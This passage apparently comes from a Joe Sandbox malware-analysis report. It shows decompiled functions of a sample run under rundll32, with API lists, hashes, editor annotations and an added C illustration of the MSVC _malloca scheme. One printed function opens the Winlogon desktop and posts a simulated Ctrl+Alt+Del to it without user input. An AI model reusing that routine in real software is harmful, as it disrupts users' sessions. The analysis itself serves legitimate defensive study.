                                                            Instruction addresses of the C-code statements above (the matching assembly column is not rendered in this extraction): 0x04651d54, 0x04651d5a, 0x04651d6f, 0x04651d7b, 0x04651dd4, 0x04651ddc, 0x04651d7d, 0x04651d81, 0x04651da1, 0x04651dc8, 0x04651dce, 0x00000000, 0x04651da3, 0x04651da6, 0x04651dac, 0x04651dba, 0x04651dba, 0x04651d83, 0x04651d88, 0x04651d8f, 0x04651d9a, 0x04651d9a, 0x04651d81, 0x04651d5c, 0x04651d61, 0x04651d6b, 0x04651d6b

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651D61
                                                            • RtlTryEnterCriticalSection.NTDLL(?), ref: 04651D73
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651D88
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04651D8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 39a5d4da897e86281d44a92af227b55c09a79862c0888fc4e83eb6d4ee1393e7
                                                            • Instruction ID: 7df9c973fe2d04dd41fc7ebefffde2c29f95fb5a62fdb9153087426559f8a2c9
                                                            • Opcode Fuzzy Hash: 39a5d4da897e86281d44a92af227b55c09a79862c0888fc4e83eb6d4ee1393e7
                                                            • Instruction Fuzzy Hash: 59018832200214DBD724A7A9F44CAFAB7ACEB95722F00413BF506C1550FB75A851C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			// Editor's annotation (not part of the sandbox output): this routine opens the
                                                            			// Winlogon desktop and broadcasts the Ctrl+Alt+Del hotkey message on it. On the
                                                            			// Winlogon desktop that message is what the secure attention sequence (SAS)
                                                            			// handler receives, so the effect is a simulated Ctrl+Alt+Del (lock / sign-out
                                                            			// screen) without any user input. Requires the SWITCHDESKTOP right requested below.
                                                            			E046456E0() {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HDESK__* _t12;
                                                            				struct HDESK__* _t13;
                                                            
                                                            				_t12 = GetThreadDesktop(GetCurrentThreadId()); // remember the current desktop so it can be restored
                                                            				// 0x400001CF = GENERIC_WRITE | DESKTOP_SWITCHDESKTOP | DESKTOP_WRITEOBJECTS | DESKTOP_ENUMERATE
                                                            				//            | DESKTOP_HOOKCONTROL | DESKTOP_CREATEMENU | DESKTOP_CREATEWINDOW | DESKTOP_READOBJECTS
                                                            				_t13 = OpenDesktopA("Winlogon", 0, 0, 0x400001cf);
                                                            				if(_t13 == 0) {
                                                            					L3:
                                                            					return 0;
                                                            				} else {
                                                            					// E04645660 is called once with the Winlogon handle and once with the original
                                                            					// handle; only GetUserObjectInformationW is visible among its subcalls, so
                                                            					// "switch this thread to the given desktop" is the likely, not confirmed, purpose.
                                                            					if(E04645660(_t13, _t12, _t13) != 0) {
                                                            						// HWND_BROADCAST (0xFFFF), WM_HOTKEY (0x312), lParam 0x002E0003:
                                                            						// LOWORD = MOD_ALT | MOD_CONTROL, HIWORD = VK_DELETE
                                                            						PostMessageW(0xffff, 0x312, 0, 0x2e0003);
                                                            						if(_t12 != 0) {
                                                            							E04645660(_t12, _t12, _t13); // return to the original desktop
                                                            						}
                                                            						return 1;
                                                            					} else {
                                                            						CloseDesktop(_t13);
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses of the C-code statements above (the matching assembly column is not rendered in this extraction): 0x046456fd, 0x04645705, 0x04645709, 0x0464571e, 0x04645721, 0x0464570b, 0x04645714, 0x04645733, 0x0464573b, 0x0464573f, 0x0464573f, 0x0464574b, 0x04645716, 0x04645717, 0x00000000, 0x04645717, 0x04645714

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 046456E2
                                                            • GetThreadDesktop.USER32(00000000,?,?,04641DAB), ref: 046456E9
                                                            • OpenDesktopA.USER32(Winlogon,00000000,00000000,400001CF), ref: 046456FF
                                                              • Part of subcall function 04645660: GetCurrentThreadId.KERNEL32 ref: 04645677
                                                              • Part of subcall function 04645660: GetThreadDesktop.USER32(00000000,?,00000000), ref: 0464567E
                                                              • Part of subcall function 04645660: GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 0464569C
                                                            • CloseDesktop.USER32(00000000,?,?,04641DAB), ref: 04645717
                                                            • PostMessageW.USER32(0000FFFF,00000312,00000000,002E0003), ref: 04645733
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                            • String ID: Winlogon
                                                            • API String ID: 3882203166-744610081
                                                            • Opcode ID: 1dfc36a4b9aada8ac749bfcf5ea06d82025f4c5795acd1738df1acb77852ca69
                                                            • Instruction ID: 043f36ef4585eb3591e0ecb23974a24c17cb0b1b3aa049ffa51979d77c26c3ee
                                                            • Opcode Fuzzy Hash: 1dfc36a4b9aada8ac749bfcf5ea06d82025f4c5795acd1738df1acb77852ca69
                                                            • Instruction Fuzzy Hash: BBF082323C0310B7EB252624BD0DFAE2619DBC5B64F151434F6029A2C4FE989C425648
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			// Editor's annotation (not part of the sandbox output): the shape of this function
                                                            			// (MultiByteToWideChar -> E04669282 -> optional second pass -> WideCharToMultiByte,
                                                            			// stack-or-heap temporaries tagged 0xCCCC/0xDDDD with a 0x400 threshold, and a stack
                                                            			// cookie read from 0x4684008 and verified on every exit) matches the MSVC CRT's
                                                            			// internal ANSI LCMapString wrapper built on _malloca/_freea, i.e. statically linked
                                                            			// runtime code rather than sample-specific logic. Likely identifications, to be
                                                            			// confirmed in IDA: E04669282 ~ LCMapStringW wrapper, E0465F190 ~ _freea,
                                                            			// E046684E7 ~ malloc, E04671860 ~ _alloca_probe, E04655AFE ~ __security_check_cookie,
                                                            			// E0466EC2E(str, n) ~ strnlen.
                                                            			E0466C4B8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				void* _v24;
                                                            				signed int _t49;
                                                            				signed int _t54;
                                                            				int _t58;
                                                            				signed int _t60;
                                                            				short* _t62;
                                                            				signed int _t66;
                                                            				short* _t70;
                                                            				int _t71;
                                                            				int _t78;
                                                            				short* _t81;
                                                            				signed int _t87;
                                                            				signed int _t90;
                                                            				void* _t95;
                                                            				void* _t96;
                                                            				int _t98;
                                                            				short* _t101;
                                                            				int _t103;
                                                            				signed int _t106;
                                                            				short* _t107;
                                                            				void* _t110;
                                                            
                                                            				_push(__ecx);
                                                            				_push(__ecx);
                                                            				_t49 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t49 ^ _t106;
                                                            				_push(__esi);
                                                            				_t103 = _a20;
                                                            				if(_t103 > 0) {
                                                            					_t78 = E0466EC2E(_a16, _t103);
                                                            					_t110 = _t78 - _t103;
                                                            					_t4 = _t78 + 1; // 0x1
                                                            					_t103 = _t4;
                                                            					if(_t110 >= 0) {
                                                            						_t103 = _t78;
                                                            					}
                                                            				}
                                                            				_t98 = _a32;
                                                            				if(_t98 == 0) {
                                                            					_t98 =  *( *_a4 + 8);
                                                            					_a32 = _t98;
                                                            				}
                                                            				// size query (cchWideChar = 0); flags: 1 = MB_PRECOMPOSED, plus 8 = MB_ERR_INVALID_CHARS when _a36 is set
                                                            				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                            				_v12 = _t54;
                                                            				if(_t54 == 0) {
                                                            					L38:
                                                            					return E04655AFE(_v8 ^ _t106);
                                                            				} else {
                                                            					_t95 = _t54 + _t54;
                                                            					_t85 = _t95 + 8;
                                                            					asm("sbb eax, eax");
                                                            					if((_t95 + 0x00000008 & _t54) == 0) {
                                                            						_t81 = 0;
                                                            						__eflags = 0;
                                                            						L14:
                                                            						if(_t81 == 0) {
                                                            							L36:
                                                            							_t105 = 0;
                                                            							L37:
                                                            							E0465F190(_t81);
                                                            							goto L38;
                                                            						}
                                                            						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                            						_t121 = _t58;
                                                            						if(_t58 == 0) {
                                                            							goto L36;
                                                            						}
                                                            						_t100 = _v12;
                                                            						_t60 = E04669282(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                            						_t105 = _t60;
                                                            						if(_t105 == 0) {
                                                            							goto L36;
                                                            						}
                                                            					// 0x400 = LCMAP_SORTKEY: a sort key is already a byte string and goes straight to the
                                                            					// caller's buffer (below); any other mapping is converted back to ANSI first
                                                            					if((_a12 & 0x00000400) == 0) {
                                                            							_t96 = _t105 + _t105;
                                                            							_t87 = _t96 + 8;
                                                            							__eflags = _t96 - _t87;
                                                            							asm("sbb eax, eax");
                                                            							__eflags = _t87 & _t60;
                                                            							if((_t87 & _t60) == 0) {
                                                            								_t101 = 0;
                                                            								__eflags = 0;
                                                            								L30:
                                                            								__eflags = _t101;
                                                            								if(__eflags == 0) {
                                                            									L35:
                                                            									E0465F190(_t101);
                                                            									goto L36;
                                                            								}
                                                            								_t62 = E04669282(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                            								__eflags = _t62;
                                                            								if(_t62 == 0) {
                                                            									goto L35;
                                                            								}
                                                            								_push(0);
                                                            								_push(0);
                                                            								__eflags = _a28;
                                                            								if(_a28 != 0) {
                                                            									_push(_a28);
                                                            									_push(_a24);
                                                            								} else {
                                                            									_push(0);
                                                            									_push(0);
                                                            								}
                                                            								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                            								__eflags = _t105;
                                                            								if(_t105 != 0) {
                                                            									E0465F190(_t101);
                                                            									goto L37;
                                                            								} else {
                                                            									goto L35;
                                                            								}
                                                            							}
                                                            							_t90 = _t96 + 8;
                                                            							__eflags = _t96 - _t90;
                                                            							asm("sbb eax, eax");
                                                            							_t66 = _t60 & _t90;
                                                            							_t87 = _t96 + 8;
                                                            							__eflags = _t66 - 0x400;
                                                            							if(_t66 > 0x400) {
                                                            								__eflags = _t96 - _t87;
                                                            								asm("sbb eax, eax");
                                                            								_t101 = E046684E7(_t87, _t66 & _t87);
                                                            								_pop(_t87);
                                                            								__eflags = _t101;
                                                            								if(_t101 == 0) {
                                                            									goto L35;
                                                            								}
                                                            								 *_t101 = 0xdddd; // heap marker: the release routine will call free
                                                            								L28:
                                                            								_t101 =  &(_t101[4]); // skip the 8-byte marker header (4 shorts)
                                                            								goto L30;
                                                            							}
                                                            							__eflags = _t96 - _t87;
                                                            							asm("sbb eax, eax");
                                                            							E04671860();
                                                            							_t101 = _t107;
                                                            							__eflags = _t101;
                                                            							if(_t101 == 0) {
                                                            								goto L35;
                                                            							}
                                                            							 *_t101 = 0xcccc; // stack marker: nothing to free
                                                            							goto L28;
                                                            						}
                                                            						_t70 = _a28;
                                                            						if(_t70 == 0) {
                                                            							goto L37;
                                                            						}
                                                            						_t125 = _t105 - _t70;
                                                            						if(_t105 > _t70) {
                                                            							goto L36;
                                                            						}
                                                            						_t71 = E04669282(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                            						_t105 = _t71;
                                                            						if(_t71 != 0) {
                                                            							goto L37;
                                                            						}
                                                            						goto L36;
                                                            					}
                                                            					// "sbb eax, eax" idiom: if _t95 + 8 wrapped around, the mask zeroes the size so the
                                                            					// allocation fails; requests over 0x400 bytes go to the heap, smaller ones to the stack
                                                            					asm("sbb eax, eax");
                                                            					_t72 = _t54 & _t95 + 0x00000008;
                                                            					_t85 = _t95 + 8;
                                                            					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                            						__eflags = _t95 - _t85;
                                                            						asm("sbb eax, eax");
                                                            						_t81 = E046684E7(_t85, _t72 & _t85);
                                                            						_pop(_t85);
                                                            						__eflags = _t81;
                                                            						if(__eflags == 0) {
                                                            							goto L36;
                                                            						}
                                                            						 *_t81 = 0xdddd; // heap marker
                                                            						L12:
                                                            						_t81 =  &(_t81[4]); // skip the 8-byte marker header
                                                            						goto L14;
                                                            					}
                                                            					asm("sbb eax, eax");
                                                            					E04671860();
                                                            					_t81 = _t107;
                                                            					if(_t81 == 0) {
                                                            						goto L36;
                                                            					}
                                                            					 *_t81 = 0xcccc; // stack marker
                                                            					goto L12;
                                                            				}
                                                            			}
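The temporaries in E0466C4B8 are obtained the way the MSVC CRT's _malloca/_freea pair works: a request plus an 8-byte header goes on the stack up to 0x400 bytes and to the heap above that, the header is tagged 0xCCCC or 0xDDDD so the release routine knows whether free() is due, and a size that overflowed is collapsed to zero. The following is an added example written for this page, not code from the sample, from Joe Sandbox or from the Microsoft CRT; it reimplements that scheme in portable C (alloca from <alloca.h>; the names marked_size, tag_block, freea_like and probe_alloc are the editor's) so that an analyst can see what the 0x400 threshold, the two markers and the +8 adjustment in the listing mean.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <alloca.h>

/* Constants as they appear in E0466C4B8; the CRT names are hypotheses. */
#define ALLOCA_S_THRESHOLD    0x400   /* _ALLOCA_S_THRESHOLD: heap above this  */
#define ALLOCA_S_STACK_MARKER 0xCCCC  /* _ALLOCA_S_STACK_MARKER: stack block    */
#define ALLOCA_S_HEAP_MARKER  0xDDDD  /* _ALLOCA_S_HEAP_MARKER: heap block      */
#define ALLOCA_S_MARKER_SIZE  8       /* the "&_t81[4]" skip: 4 shorts = 8 bytes */

/* Request size plus the marker header; collapses to 0 if the addition wrapped.
 * The decompiler's "cmp / sbb eax,eax / and" sequence around "_t95 + 8" is
 * this guard: an overflowed size becomes 0 and the caller's null check then
 * fails closed instead of a too-small block being handed out. */
static size_t marked_size(size_t n)
{
    size_t total = n + ALLOCA_S_MARKER_SIZE;
    return total < n ? 0 : total;
}

/* Write the marker at the start of a raw block and return the usable region. */
static void *tag_block(void *raw, uint16_t marker)
{
    if (raw == NULL)
        return NULL;
    *(uint16_t *)raw = marker;
    return (char *)raw + ALLOCA_S_MARKER_SIZE;
}

/* _freea counterpart (E0465F190 in the listing): look 8 bytes before the
 * pointer; only a heap marker means there is a malloc block to release.
 * Returns 1 when a heap block was freed, 0 for stack blocks and NULL. */
static int freea_like(void *p)
{
    uint16_t *hdr;
    if (p == NULL)
        return 0;
    hdr = (uint16_t *)((char *)p - ALLOCA_S_MARKER_SIZE);
    if (*hdr == ALLOCA_S_HEAP_MARKER) {
        free(hdr);
        return 1;
    }
    return 0;
}

struct alloc_probe {
    uint16_t marker;     /* marker found in front of the returned block */
    int      heap_freed; /* what freea_like reported */
};

/* Allocate n bytes the way the listing does (stack at or below the threshold,
 * heap above it), use the block, read the marker back, release it and report.
 * The stack branch must sit in the caller's own frame, which is why the real
 * _malloca is a macro rather than a function. */
static struct alloc_probe probe_alloc(size_t n)
{
    struct alloc_probe r = { 0, 0 };
    size_t total = marked_size(n);
    void *p;

    if (total == 0)                         /* overflowed request: refuse */
        return r;
    if (total > ALLOCA_S_THRESHOLD) {
        p = tag_block(malloc(total), ALLOCA_S_HEAP_MARKER);
    } else {
        void *raw = alloca(total);          /* lives until probe_alloc returns */
        p = tag_block(raw, ALLOCA_S_STACK_MARKER);
    }
    if (p == NULL)
        return r;

    memset(p, 0x41, n);                     /* the caller may use all n bytes */
    r.marker = *(uint16_t *)((char *)p - ALLOCA_S_MARKER_SIZE);
    r.heap_freed = freea_like(p);
    return r;
}
```

The practical use is triage: a function carrying these markers and this threshold is runtime scaffolding around a Win32 call, and the analyst's attention belongs on the call in the middle (here E04669282, under the LCMapStringW hypothesis) rather than on the allocation dance around it.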


























                                                            Instruction addresses of the C-code statements above (the matching assembly column is not rendered in this extraction): 0x0466c4bd, 0x0466c4be, 0x0466c4bf, 0x0466c4c6, 0x0466c4ca, 0x0466c4cb, 0x0466c4d1, 0x0466c4d7, 0x0466c4dd, 0x0466c4e0, 0x0466c4e0, 0x0466c4e3, 0x0466c4e5, 0x0466c4e5, 0x0466c4e3, 0x0466c4e7, 0x0466c4ec, 0x0466c4f3, 0x0466c4f6, 0x0466c4f6, 0x0466c512, 0x0466c518, 0x0466c51d, 0x0466c6b0, 0x0466c6c3, 0x0466c523, 0x0466c523, 0x0466c526, 0x0466c52b, 0x0466c52f, 0x0466c583, 0x0466c583, 0x0466c585, 0x0466c587, 0x0466c6a5, 0x0466c6a5, 0x0466c6a7, 0x0466c6a8, 0x00000000, 0x0466c6ae, 0x0466c598, 0x0466c59e, 0x0466c5a0, 0x00000000, 0x00000000, 0x0466c5a6, 0x0466c5b8, 0x0466c5bd, 0x0466c5c1, 0x00000000, 0x00000000, 0x0466c5ce, 0x0466c608, 0x0466c60b, 0x0466c60e, 0x0466c610, 0x0466c612, 0x0466c614, 0x0466c660, 0x0466c660, 0x0466c662, 0x0466c662, 0x0466c664, 0x0466c69e, 0x0466c69f, 0x00000000, 0x0466c6a4, 0x0466c678, 0x0466c67d, 0x0466c67f, 0x00000000, 0x00000000, 0x0466c683, 0x0466c684, 0x0466c685, 0x0466c688, 0x0466c6c4, 0x0466c6c7, 0x0466c68a, 0x0466c68a, 0x0466c68b
                                                            0x0466c68b
                                                            0x0466c698
                                                            0x0466c69a
                                                            0x0466c69c
                                                            0x0466c6cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c69c
                                                            0x0466c616
                                                            0x0466c619
                                                            0x0466c61b
                                                            0x0466c61d
                                                            0x0466c61f
                                                            0x0466c622
                                                            0x0466c627
                                                            0x0466c642
                                                            0x0466c644
                                                            0x0466c64e
                                                            0x0466c650
                                                            0x0466c651
                                                            0x0466c653
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c655
                                                            0x0466c65b
                                                            0x0466c65b
                                                            0x00000000
                                                            0x0466c65b
                                                            0x0466c629
                                                            0x0466c62b
                                                            0x0466c62f
                                                            0x0466c634
                                                            0x0466c636
                                                            0x0466c638
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c63a
                                                            0x00000000
                                                            0x0466c63a
                                                            0x0466c5d0
                                                            0x0466c5d5
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c5db
                                                            0x0466c5dd
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c5f4
                                                            0x0466c5f9
                                                            0x0466c5fd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c603
                                                            0x0466c536
                                                            0x0466c538
                                                            0x0466c53a
                                                            0x0466c542
                                                            0x0466c561
                                                            0x0466c563
                                                            0x0466c56d
                                                            0x0466c56f
                                                            0x0466c570
                                                            0x0466c572
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c578
                                                            0x0466c57e
                                                            0x0466c57e
                                                            0x00000000
                                                            0x0466c57e
                                                            0x0466c546
                                                            0x0466c54a
                                                            0x0466c54f
                                                            0x0466c553
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c559
                                                            0x00000000
                                                            0x0466c559

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04667F57,04667F57,?,?,?,0466C709,00000001,00000001,44E85006), ref: 0466C512
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0466C709,00000001,00000001,44E85006,?,?,?), ref: 0466C598
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,44E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0466C692
                                                            • __freea.LIBCMT ref: 0466C69F
                                                              • Part of subcall function 046684E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04668519
                                                            • __freea.LIBCMT ref: 0466C6A8
                                                            • __freea.LIBCMT ref: 0466C6CD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 8e8bef042a3eeae6bcef593c6ba87c148db725d12f6153c81a4d959f31dc03df
                                                            • Instruction ID: e25a4ee5a019a940299c6a328658dc1ec0a3bf7688a9f51e0cbf68071058c292
                                                            • Opcode Fuzzy Hash: 8e8bef042a3eeae6bcef593c6ba87c148db725d12f6153c81a4d959f31dc03df
                                                            • Instruction Fuzzy Hash: D651F272710A16AFEB258FA4CC48EBB77A9EB90754F154628FC46D6240FB34FC40C698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04653680(void* __ecx, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t26;
                                                            				void* _t28;
                                                            				long _t29;
                                                            				void* _t30;
                                                            				intOrPtr _t32;
                                                            				void* _t37;
                                                            				long _t49;
                                                            				void* _t54;
                                                            				signed int _t56;
                                                            				long _t58;
                                                            				void* _t68;
                                                            				void* _t70;
                                                            				void* _t77;
                                                            				void* _t81;
                                                            
                                                            				_t26 = _a20; // addr 0x04653683
                                                            				_t54 = __ecx; // addr 0x04653687
                                                            				if(_t26 == 0) { // addr 0x0465368c
                                                            					_t56 = _a16; // addr 0x046536ec
                                                            					_t70 = _a12; // addr 0x046536f0
                                                            					if(_t56 != 0 ||  *((intOrPtr*)(_t70 + 0x18)) == 2) { // addr 0x046536f5
                                                            						 *(_t70 + 0x1c) = _t56; // addr 0x04653738
                                                            						_t28 =  *((intOrPtr*)(_t70 + 0x18)) - 2; // addr 0x0465373b
                                                            						if(_t28 == 0) { // addr 0x0465373e
                                                            							_t29 = E04653800(_t54, _t54, _t68, _t70, _t77, _t56, _a8, _t70); // addr 0x046537ea
                                                            							goto L23;
                                                            						} // addr 0x046537ea
                                                            						_t30 = _t28 - 1; // addr 0x04653744
                                                            						if(_t30 == 0) { // addr 0x04653747
                                                            							_t58 =  ~_t56; // addr 0x04653768
                                                            							_t32 =  *((intOrPtr*)(_t54 + 8)); // addr 0x0465376a
                                                            							if(_t32 == 0) { // addr 0x0465376d
                                                            								_t24 = _a8 + 0x44; // 0x44; addr 0x046537c1
                                                            								InterlockedExchangeAdd(_t24, _t58); // addr 0x046537c5
                                                            								E04652150(_t54, _a8, _t70); // addr 0x046537cf
                                                            								return E046547C0(_t54, _t54, _t68, _t70, _a8, _t78); // addr 0x046537e0
                                                            							} else { // addr 0x0465376f
                                                            								_t37 = _t32 - 1; // addr 0x0465376f
                                                            								if(_t37 == 0) { // addr 0x04653772
                                                            									_t22 = _a8 + 0x44; // 0x44; addr 0x0465379b
                                                            									InterlockedExchangeAdd(_t22, _t58); // addr 0x0465379f
                                                            									E04652150(_t54, _a8, _t70); // addr 0x046537a9
                                                            									return E04654900(_t54, _t54, _t68, _t70, _a8, _t79); // addr 0x046537ba
                                                            								} else { // addr 0x04653774
                                                            									_t29 = _t37 - 1; // addr 0x04653774
                                                            									if(_t29 != 0) { // addr 0x04653777
                                                            										goto L23;
                                                            									}
                                                            									_t20 = _a8 + 0x40; // 0x40; addr 0x0465377d
                                                            									InterlockedExchangeAdd(_t20, _t58); // addr 0x04653781
                                                            									return E04652150(_t54, _a8, _t70); // addr 0x04653794
                                                            								} // addr 0x04653794
                                                            							} // addr 0x04653772
                                                            						} else { // addr 0x04653749
                                                            							_t29 = _t30 - 1; // addr 0x04653749
                                                            							if(_t29 != 0) { // addr 0x0465374c
                                                            								goto L23;
                                                            							}
                                                            							return E046538F0(_t54, _t56, _a8, _t70); // addr 0x04653762
                                                            						} // addr 0x04653762
                                                            					} else { // addr 0x046536fd
                                                            						E04652920(__ecx, _a8, 1, 0, 0); // addr 0x04653708
                                                            						_t29 = E0464C930(_t54 + 0xb0, _t70); // addr 0x04653714
                                                            						if(_t29 != 0) { // addr 0x0465371b
                                                            							L23: // addr 0x046537ef
                                                            							return _t29;
                                                            						} // addr 0x046537ef
                                                            						return HeapFree( *( *(_t70 + 0x14)), _t29, _t70); // addr 0x04653732
                                                            					} // addr 0x04653732
                                                            				} else { // addr 0x0465368e
                                                            					_t81 = _a12; // addr 0x0465368e
                                                            					if(_t26 != 0x2736 && _t26 != 0x3e3) { // addr 0x04653696; 0x2736 = WSAENOTSOCK (10038), 0x3e3 = ERROR_OPERATION_ABORTED (995)
                                                            						E04652920(__ecx, _a8, 2,  *((intOrPtr*)(_t81 + 0x18)), _t26); // addr 0x046536a8
                                                            					} // addr 0x046536a8
                                                            					if( *((intOrPtr*)(_t81 + 0x18)) != 3) { // addr 0x046536b1
                                                            						L6: // addr 0x046536c5
                                                            						_t49 = E0464C930(_t54 + 0xb0, _t81); // addr 0x046536cc
                                                            						if(_t49 != 0) { // addr 0x046536d3
                                                            							goto L24;
                                                            						} else { // addr 0x046536d9
                                                            							return HeapFree( *( *(_t81 + 0x14)), _t49, _t81); // addr 0x046536e9
                                                            						} // addr 0x046536e9
                                                            					} else { // addr 0x046536b3
                                                            						_t49 = InterlockedDecrement(_t81 + 0x28); // addr 0x046536b7
                                                            						if(_t49 != 0) { // addr 0x046536bf
                                                            							L24: // addr 0x046537f3
                                                            							return _t49; // addr 0x046537f3
                                                            						} else {
                                                            							goto L6;
                                                            						}
                                                            					} // addr 0x046536bf
                                                            				} // addr 0x046536b1
                                                            			}

                                                            APIs
                                                            • InterlockedDecrement.KERNEL32(?), ref: 046536B7
                                                            • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?,04653568,?,?,?,?,00000000), ref: 046536E0
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000001,00000000,00000000,?,?,00000000,?,04653568,?,?,?), ref: 04653728
                                                            • InterlockedExchangeAdd.KERNEL32(00000040,?), ref: 04653781
                                                              • Part of subcall function 04652150: SetLastError.KERNEL32(00000000,?,00000000,?,?,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 0465216D
                                                              • Part of subcall function 04652150: InterlockedDecrement.KERNEL32(00000028), ref: 046521E6
                                                              • Part of subcall function 04652150: HeapFree.KERNEL32(?,00000000,00000000,00000000,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 04652207
                                                            • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 0465379F
                                                            • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 046537C5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$ExchangeFreeHeap$CriticalDecrementEnterSection$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1561599947-0
                                                            • Opcode ID: df6412c463660c1970ef46bfdb595a8c380f782a5a3d0ff7e21ea37daea34a81
                                                            • Instruction ID: 191d07a5fdfe0e02279b4367ecb7dcbe5d4aba81b58603709d2da03f121bc905
                                                            • Opcode Fuzzy Hash: df6412c463660c1970ef46bfdb595a8c380f782a5a3d0ff7e21ea37daea34a81
                                                            • Instruction Fuzzy Hash: E841A473200215ABDF249EA9EC88E9B776CEB95761F00012EFF06C6760EA31F454DB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 23%
                                                            			E046556C0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, intOrPtr* _a8) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				void* _v28;
                                                            				intOrPtr* _v32;
                                                            				signed int _t40;
                                                            				intOrPtr _t42;
                                                            				long _t45;
                                                            				intOrPtr _t51;
                                                            				intOrPtr _t53;
                                                            				void* _t56;
                                                            				intOrPtr _t57;
                                                            				intOrPtr _t58;
                                                            				intOrPtr _t60;
                                                            				void* _t64;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t74;
                                                            				void* _t75;
                                                            				void* _t77;
                                                            				void* _t81;
                                                            				intOrPtr* _t82;
                                                            				struct _CRITICAL_SECTION* _t83;
                                                            				signed int _t84;
